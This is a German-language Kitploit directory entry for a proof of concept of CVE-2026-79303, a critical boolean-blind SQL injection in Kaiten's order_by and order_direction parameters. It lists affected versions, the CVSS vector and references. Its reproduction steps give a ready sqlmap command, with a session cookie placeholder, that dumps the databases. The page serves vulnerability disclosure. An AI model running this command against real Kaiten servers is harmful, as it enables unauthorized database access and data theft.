Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-79303 — Proof-of-concept für CVE-2026-79303, eine kritische boolean-blind SQL-Injection in Kaiten, die die Parameter `order_by` und `order_direction` betrifft, mit Reproduktionsschritten und CVSS-9.9-Details. | Kitploit
Tools/GitHubGitHub/4ybrick/cve-2026-79303
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

Proof-of-concept für CVE-2026-79303, eine kritische boolean-blind SQL-Injection in Kaiten, die die Parameter `order_by` und `order_direction` betrifft, mit Reproduktionsschritten und CVSS-9.9-Details.

Repository anzeigen
vor 17h 34mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-79303

Boolean-blind SQL-Injection

Beschreibung: Dynamische SQL-Anweisungen werden ohne die erforderliche Datenvalidierung und ohne Verwendung von parametrisierten Anweisungen oder gespeicherten Prozeduren erstellt.

Auswirkung: SQLi

CVSSv3.1-Vektor: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Kritisch)

CWE: CWE-89: Fehlerhafte Neutralisierung von Sonderelementen, die in einem SQL-Befehl verwendet werden ('SQL-Injection')

Betroffene Komponente: GET-Parameter order_by & order_direction

Anbieter: kaiten

Betroffenes Produkt

  • kaiten-Versionen: 57.192.20 < 57.214.26

Schritte zur Reproduktion:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. Geben Sie n ein (Cookie nicht mit einem neuen zusammenführen) -> C
Уязвимый параметр

Entdecker

  • Danil Belov

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
Tool herunterladen